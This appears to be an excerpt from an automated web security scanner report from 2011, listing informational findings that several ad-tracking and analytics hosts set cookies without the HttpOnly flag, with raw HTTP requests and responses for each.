The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cgi-bin/wsv2.cgi?108645 HTTP/1.1
Host: hits.nextstat.com
Proxy-Connection: keep-alive
Referer: http://orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Cache-Control: private
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: webStat_108645=12beedaea78edd58b2a6f91af1fe6b38; expires=Sun, 09-May-2021 13:32:25 GMT; path=/; domain=.nextstat.com
Set-Cookie: webStat_108645_mv=12beedaea78edd58b2a6f91af1fe6b38; expires=Sun, 09-May-2021 13:32:25 GMT; path=/; domain=.nextstat.com
Content-Length: 4096
Connection: close
Content-Type: text/html; charset=UTF-8

function wf_get_rfsqv() {
var q = (WS_rfs_3p && WS_ref.indexOf('?') > 0)?WS_ref.substring(WS_ref.indexOf('?')+1):WS_rfs.location.search.substring(1),v = q.split("&");
for (var i=0;i<v.length;i++)
...[SNIP]...
9.59. http://hits.nextstat.com/scripts/wsb.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hits.nextstat.com
Path:   /scripts/wsb.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /scripts/wsb.php?WSc=yes&WSpn=&WSref=&pg=28925&ac=108645&w=1920&h=1200&c=16&js=1.6&WSvp=http%3A//orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html&tz=300&ls=&cam=undefined&evt=undefined HTTP/1.1
Host: hits.nextstat.com
Proxy-Connection: keep-alive
Referer: http://orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: webStat_108645=da8aee5f04e7ebdfbf66e7f2c334e7d5; webStat_108645_mv=da8aee5f04e7ebdfbf66e7f2c334e7d5

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:43 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Cache-Control: private
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: webStat_108645_last=6c0c2cc469f86170c8aa98036158dc8b; path=/; domain=.nextstat.com
Set-Cookie: webStat_108645_lastvisit=12+May+2011+06%3A33%3A43; expires=Sun, 09-May-2021 13:33:43 GMT; path=/; domain=.nextstat.com
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 195
Connection: close
Content-Type: image/png

.PNG
.
...IHDR...x.........|.k.....PLTE.............xIDAT..c`..0.`.o`..`."..0..0X0.30..`.a`n...| .n.P....E@..... ...<P}D).(``..w..?...?........@.H|6.S.0$......H.1....z....-...jw....IEND.B`.
9.60. http://image2.pubmatic.com/AdServer/Pug  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTc4JnRsPTE1NzY4MDA=&piggybackCookie=uid:2724386019227846218 HTTP/1.1
Host: image2.pubmatic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pubmatic.com/aboutus/overview
Cookie: KRTBCOOKIE_22=488-pcv:1|uid:3658195966029417970; PUBRETARGET=82_1399045295.806_1336140548; KRTBCOOKIE_148=1699-uid:E3F32BD09546C94DAD95D1B540110C; KADUSERCOOKIE=ED7381A8-F9AB-49E0-BC2C-2A944C186892; __utma=103266945.1788404461.1305207252.1305207252.1305207252.1; __utmb=103266945.3.10.1305207252; __utmc=103266945; __utmz=103266945.1305207252.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:34:32 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: KRTBCOOKIE_57=476-uid:2724386019227846218; domain=pubmatic.com; expires=Sun, 11-May-2014 13:34:32 GMT; path=/
Set-Cookie: PUBRETARGET=82_1399045295.806_1336140548.78_1399815272; domain=pubmatic.com; expires=Sun, 11-May-2014 13:34:32 GMT; path=/
Content-Length: 42
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D.;
9.61. http://image3.pubmatic.com/AdServer/UPug  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image3.pubmatic.com
Path:   /AdServer/UPug

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/UPug?operId=2&pubId=398&pixId=6&ran=0.19279520929519856&pageURL=http://www.pubmatic.com/ HTTP/1.1
Host: image3.pubmatic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pubmatic.com/
Cookie: KRTBCOOKIE_22=488-pcv:1|uid:3658195966029417970; PUBRETARGET=82_1399045295.806_1336140548; KRTBCOOKIE_148=1699-uid:E3F32BD09546C94DAD95D1B540110C

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:34:27 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: KADUSERCOOKIE=C1979996-4E95-4668-85DB-5560A01CB783; domain=pubmatic.com; expires=Fri, 11-May-2012 13:34:27 GMT; path=/
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 473

document.write('<script type="text/javascript" src="http://ads.pubmatic.com/UniversalPixel/398/6/pixel.js"></script>');
document.write('<iframe name="pbeacon" frameborder="0" allowtransparency="true"
...[SNIP]...
9.62. http://js.revsci.net/gateway/gw.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/gw.js?csid=G07610&bpid=S0277 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a86e&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4df0a87c&0&&4dca5d68&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4df0b07e&0&&4dca8ab1&271d956a153787d6fee9112e9c6a9326; rsiPus_qbvO="MLsXrrEOpxpv55DW8tahZ2a57v4BlC60cICOgIfdHU7gwI+bhP0TqX40neBrVzd04YF7hotNL+h4vvc66tVVUjceSeakCP8FKl+7vpw/cPKd8tMu3PMCPoyxK8+ZjwDWyB3QMrpomCL0QiC5Kvy/YgnB8KTN7G9dLpnN5M3RK+PP1zwMehHWmM2JccWRv5ZmhNfQmN/YDBU94E+biCIoa0pKkv2eA2x+zJ1SCIL380rO+L9Lk2iLRCLsePDloY4CaZKvkWcnHN4spMzHQnUA9nMhOsrooPww0kmF/1pBhtUOQIGwwBNshy3r9jL9DmeVgwo+si4cw2GLg+UiObBCYgDoqFuF17tgWtie8ndkcM4/dxQZHmAVAFp6Cd4+NKEDE1ApHgzdWMCRN3mtXvTF3dagjo97ZcxX3TK0H5gNZL/tX25K+rZRwN8wPyK9oLx40INCM6m5859n+iEwb4c3uHEIWIExaGsanUSO3meucYKt8SqtiIB1ZKfcV2EWnE5l0JI9ym05H0J1D++1YxD2YWIf3FMp0ODLJXHC5LJl8HAXM9kRR0eUwpIWZ43I4Sxu/ghMwCqycSGD5P5qCz+NfB7cpFNnCm/MZxXAtHhkwlvld7DwvFMTxzkmteonO6+tWDCvSgxfKLeBCsnh7/g2pdMlW86tZQUhX+5vIkdTKTAbn/ygJRg0T3sdyAIGgf6VindVNH18jDokISc3IGyw/B24wJC4km6cNzLCqq3zgXP3vffJqf4px62L8VMyvj3CaMObL1w9lE2lhd4iKvN3GccP1FcTweH5kHDsZZBw7FHK1W7K9ytiQtKzGQRCBtx0rurYuoXmj+tBMHYIGgQGQbpACUKiwMwgO11XDJXNsqWXOeTs409iMvRAAhFR3MmxY/Ai8JtqiI6b0Q1+g1WTMqPGi0honF4/t46uL9iK78Kt/amFrG5zPGbmiPmMFkLKl9wLroTlxm+6qkNbYbThc0/QKEKH9b1zlGLxfdlc3hqznACvxpp0ybDR66WjOYSYr5GJsa1Cu2wcBHbKR1AxsYBzoLba+u6l87gczye8xuTrYhFfwlnHydy7IYalgPJBk32vZgWW2CXqypZtqnwMKkA2NoSDvvRLOZsd5s2E5nriVmz0A020hMNet6ezR0BbsbFJkikbhD25+D5hxe38KqYGvD586gb8nEzI0j5isfTJ/lkLrhbQFBZeshLI9NVhvhrxY3ujvMVlKz2TG/zsc7BVzk9fFPtT7mgROfudWRI+VvwrnXNE2vCSQzOJZeEAKPJctLVBCeeH5f0I+bMVOeVLPDBFeBnbAN+UOthqW+XB3wOga/8nLvsjoupDcwH+hneOk/D89Naxn/NKF3MEN04OWc1SJ6wrzqU6VhG4EvS+Zv+fJ8Gt98W7PtFLVLD0oQ=="; rsi_us_1000000="pUMV4ylDPxYY7RUCt3RYS68XU2Z/uOqvJR0SNgYO9rFAJiyyAu+FxS1Z30ODwyEFcoEx3T1Eetffz3Mf20XkwCrwYFLZZJxtyzGTJat2XTjlIN8P+hQPSL5K9zsL+kusRTvgKYlhihBhqZKK6GKen73oVAV9BWGkbl//D/fTGMFsID28cq6D7duOtAY3S7ThixmzbEOMxOHaa0VO3cDkKGVKS9qitOaUYlvgkLY1MKDOtODLrFUkILMlSRpCe7+47YCa4Yvgfmntw+kxPheKq6wDe8Fd8gOqjo+YsYcbcBetJ/UlUtydzNb+VQfdT8dEj/2h41IZ5vmY/5vsAZW1gUJs43Y9iklV1tAb9jY/G3Rk4zy39xByfOtBbqnZZm8zU97WhpjXwdwTrCSEuJ4CNdY/fhO3f+aPVPTKG9RnYRL0QJ4kFGhThODFPtf76e2qY1SQ9slSHrnY01CTJTrHMxySjJKQAVAr1obI8ilzYsPlaT1OSvYVS9TK9PoGrO5Jx5bXw/zwwE6Wrxwt7KjBiQjMb8pc2/6daLQ71r2XwEeaREz3clc3XYbmXIZKYmXXjpSqe6jB0kwcSkFst/ViDZpkDsFltV4ci5YQ/eJMqmyKrF/0uup6pq93xJKQibeBPvkCxBjBIGLPE6+meOzdSPUPxAyoXPah9kyi7C70w/Ic06E82HDgxMfptenJH+QxMcJPPGsyFAVT+6SBuOjuKJ5KYDNUBXyxL2dg7B2oqDAiqh1W+megWtR3XoJXxE+b3k70BKlvT5YvEuZ0/RALqrZKe/52guDCx1yv8IEqB3NuIb5M9E0P1eLplz4HhYGMt1XJa6PPDxd4ljqvSFEQClJtagh9UzDEFg6Cb5LdDadrKiwtHRl62r3F/lJB8Wq3syJAxzEPLO4bM0VnXvq5faJnoE+6gBD5yjyVDaOWRfQzLGIWkNHa+f2KJvAyTQlC4oHYQZOGM/cVc3WrnRQmj1KDwCk/46Dq6gu9fFpETdaKz7DpE5AVcVASeUiRu6t0E9gdbxRFlQnHfQxlj0O0yv/8sVDJfLtBv7VEv6KvS85d/vyrS+3/lJtowlLX877yZqlnDrYhsgIzJ/B2kGU/Y2tWcJtJNzrSLvL6uC6zAE3YCN+2b8ZfetlvToWWUxLm+kOAX5sNQa84+z+Y7BiXKA28ArWYuR2BzhZYqV+lNsl8IuYWHrQEhBevE6yTgfXBfZ5ZWDuef3muciM4uxq9eRevsktzwd4ZolhUro4q9RDXzP+z/Jt3SlkekF3F1UyZn5rEt9sK3VhPrPz7bFs0pGO/fShWwUhEJGkkGofDmr7oO9xVS0wlWlGR+HiZLLiNXtFztdl/InifBdzZrv7tEgPT/Ekl1qqx4lzM76Hls1fjGRalSthbIGWedXoj3t9T64fqUJnYWdom7ygUV4OI6Uek4g2aJV2sE2HBrV7ibQMfkHW6H2qlf/AvGzXk5juIW8AOsU6N3bJugxzerwleYqkN4SEXHO2TsUUB2Hii30ULmVN5KVwl4AT7t07WbQfIgUgh+J4zgAJSZ1//mvY7cAo2t7r+WZ+3UqK9EVFlB88NDlOgh4Jm3SdKvwyEx2VIxC8FQZezWpUIHfmHUohseSJ3s3QYI0FyZt+UimHMdHcAt0unq75eibm7XCXgvJjZ8QEa2uTso9gthoSRwjtm4zJD8KuDs9Dol9dL10gwkePtd9XjMMl1IiMfHEGPMzYrTXatfWNnptioKHatYztwbz3JzwC1e1SaBMwSq2wE51biaKnVTIX7gjw1dfMUEcH+SSwe4EKfaZDW3Y8jNtoFzFv7v+gK3Q=="; NETSEGS_E05510=bff01c00ddc153c5&E05510&0&4df0b096&0&&4dc9f625&271d956a153787d6fee9112e9c6a9326; udm_0=MLv39CEJZjpv597JwHIRxS7gdG4nwPAq6ZuDH+vX93uE8x+80+EqavgLMjsVMcRzx4ED/5sU/DdHAgOy6ZFF6u9krYB07BFG6K2gCx9zATNAOyKPGfTqVHvkpDwSF+KJXhEbXYpBgIjd3IWX3TqLfPz6jE8vTUf3pdaWUiZB3YUWt0CiIC5F0X3tPgb/SivyvtveJcRXnIKv7kXwRgYvCvr55V+AZTEVXPZ4e3YCovCIOgMpRBSkPQefrNyf8+fevxeSnnxLtLBTd7bn/zQn98TJd0YWeOHbFIVzmnJlL/meZ5F8yEzm7HiS+gYXKCqjfBEgEJXe7pa4nhHi/FyghIrWjtv72jtBRuTmEa1PtCcp9wfqOSXME/TC3DDlgc0Ij565ULgb+NLzIZ6TpI8vIyqOkYR2CJSFdZdVnBUG0ncgAuL4be/4qG/lpeLJAr4R2ZcdSh9ENtyBu0UsstxyoNHHwBT0SxG1olEQxWdxat7mSTK4NzNH7bvJyyZeNxeZoviFwczbub9BMnSayVKnrf8mLmZYn0G+URiIr9to1aqeDG6xKYVAmQwGVEGKynGOyuqpwObt+MyvmywUWEZ1qy3YzLOSZi95dlvgQqf5nm2jI0E/rWzPceCg9nrDXdY5aA2KiG6/Ag/Qtn9BE0P6tHnl8GXHStyZrY4yXNhIUbljw44dlYagYpCHt4M3J4bPZG8YwZUp0ecARePUDtezFyfvRsc1iatb1pDP+cq/6Iul6LmWpIrzCvxlo9THyXVf5SG33tg9Lw2R/Ro5VrxlHAMqi5EG0xBZZuKHWEnXQrAXGw8FaURhjx71p9CkHtHT1BpsJC15G4HDCuuHnAqa2MRPkYaEZL2cVa7b84SiSmL76sma6ZAVTmsWibG6oMtgf+rO6uurjCoZJ5OCsW83NGfMcjZCzPl33xUGXappEWzObGyaUvOz7ose722NuQ6CgmfMlORcS+CfKwXULjWH6Zy36QCvGrnsM/T/4K0FLlEQnA/ZrpS8O/uyK8UlrSZbknpF5SKlqTmNy5yEGuQ4SS+qP+oPyRgWbGkd6TLhbS8wVZYRN53ZAc0jxNNVRDNVFRE9QSI2VrlZ/Ka1RizjzXzy0Mrq6kcHNlCK91uDwhC94dfZh3mu4LEbkhOgwvScvmwGeZy8gGWoQEjk0gAgb9SgQmtGBl5C+T7TrdHq6EejqJkS0OH/st2RxRBZGNqPJSPFO3Z9nkwH7dr0G89yU1lVThr9TPeyrKuuQlOnafjtcNVr+buGb3emJOGcjzfH90v2UdAQiKm9gZ6BDbLaq/nbVWxP/5HqWbZLa2/RS2GM94ibxZPKXwTQTSnoK6758zl7N8nLPQGrb7mauaNrJ0v4zNciOQWnVNzZaqhQO8UVgcjuWrUQiJTPQWDKxu4w8eoM53ZEdNIh7WnKbwDRVqkqD0y1KsGwOeg2fZkSaLcNFed69lS3DYgh37CBN1ozAybkSybs/DUjRL93JTQZlPIkdLkbJkhmGdhN2G2Xb4uomwrwx4xxkHDHG3BOj3sObWJNvojJs1Id/pPS2nPanvOm; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4df0ca7b&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dca0a20&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUPF4U9BenIMH/AtZKgq+hMq9rGiLObgpWFak32IrQMGnmfHuiYgDQaAwxUK6pw26DoqxCfW+epi+gzC9/vSCTB7imSFpaF3jgTKu6gUiM/MJRCfSdEcMdPs9/RVdVv7DqMTpKG3eKUxCc7lJ3d4uPsvbVf83JLReyHT0jN1BuyEb58GYv/LxKgpVexexquZuKeRToBghnCuFqedwf+X0+YnFhOw3uzxK/X4Wxo4bJAn8weCR02tpdbg/bYqVKAiPNbO41848Z9KpOZKRQN0OL0sNJ8kypkLypj36j7Rm+95zJAPtLzSvq8LWyyFTHdPsSmDFFA0qN+hBON4H4Tla7JACrXtwZLbYkaPwY2qoG7JOev/Lg0kSAEhAN2j3I9if3B+HvsTrxBc9VsohGW/b5fsT/tmOND8GjL62aEQOR/ttAt0Onz37bTRxfaITzexWf8P4aLkngBQJFzAETbKu4iCLf6EtYpH/CugM6sxzwqlgJTBZx1A1ese7+q70nG0SvwKBqGIcTjIrFSjkDn5CzxinzmiyVAsj6DVZYCcQpO4K6wrWzDkpOGhK634uztGpLBxzNDkL2iLHVGdEKz5Km4E8XnMsb2RyQbsw85L6avb/ndujGtWPB5NktpSBX1O6xykGxIlNcuEc5A5TFcViyPHJABw0+SY5WKWD8c2KF7QNnJTYgtZ3vm04i/IDcOYg2G5ip1hh4c1VnrEwseNA7qKF/Cy3/YzH+zE075ArEjlj9BV5xbUneXnlUeWlupie2OZe8u2ys5vCR9G9DnRtFNHmqqqFsP1L8ZVcernhjIjN6695svzJRD24Wa6NO2oyXiieRAotYX9Fznu+/iFDnFKMY6gcKtR40K5DJPZ; rtc_8VB0=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLv39zMJZjpn557JwHIRqQjgYATtJkLnfaG2qg26X5FhLavzzC9h18LIqIAEiQUbBEgS1qnrAGsSnMmXYtFF6O9NSG0d9Th00OxdjL0rAC2k7l1HlvXJXf/YR0wRu61hIrIc1FaF2JTcrssS7xhdmOsiDwP1R4hwu3SvUtjRfPy1yofzFWLy8DjgpF9Vu7y4QwN/GkQ2/AyzquXyJjHCzknvDbCz6nsZ1c0/zvhv0W+qBEtF79B0Pql0zgq8jJvWvQ5VkxFk4eMp6+fJpD5GQL+QJdHzVdawu07b0A9loBw90WAMSKE0I8mgTw1pOaMgEWar402fI5latT9yANSkAB2Lf1qfu+EhE2ChS5WN/EjGtkKH43+wJlR7Pjdeevg3qnD/7IxpLRlE9ejyrT+7nQKNH8d89unWyeFM/168Lh8zsOxtTSECyBTgJJbQpSMDmhuS6oZKVNi4E4vgVo+qICGaCwqqFmt8xT0nvsitok/EOj3ovnlLV7cBNznhaclXHp+UFCT/HJofMu4j0VfsoRMtw0Xh7B+Uh9gu2dSmj4yWC3Z8hioKqo8WEgfACSEqsCQphySRsy42iZ9q3KRSy4a0i6w8eF+UnIDBhNhGu3/JZrTMJ5HHqve2KS6PN6LBlg9I3RkUio0gdasO+K59I7XpNIm5xgLYO8RrAPbPDNm/zJdifrr6zESJmDtakc4+/YsbioIt6v912EosGy9V3SZDkpwymv+xuZCXUR2WE/tfnymMHMbPwXd+eRsR9kHjmp3eK3Z7OKG56q0Q7v9m+BQoybX50UGJLl8xnhVaSkOBXpQQ97Vnh/pLFs7DniXDWm87NxAaJub6CAoDJ8BPpfcyaeIPe0aTrJMNqkaHjZplxRL+RNYCPTenQCV4d8z2x5yfGMTc6oi8d7OwLKwXdekey590ltmfqTJm44gduD7mRI3rLNNjlfSfzLsVRwmWk0uPoi62sZyGV1I15UgM+FbjvzZnISOQlJVI2MVhFnuE3TTRYQyPq8alwRZ0HvQCOEFaOBxcO3i+WLTAhNybFKJ90D9tReNLg9rYbLZW8VFGFTAjKToU/vK+X36h1I8tNR22tIWe8AfFSe8o+HAeOufZB3wjKYrd7KvYSV+rChZtSxWzg7DVcSCw0QRmZwPfygPsfHZ6TENLHOF7FNECzkjpRQQVzJNctcKy/0lTCVsZxYxxS6AgdbDDSU7qW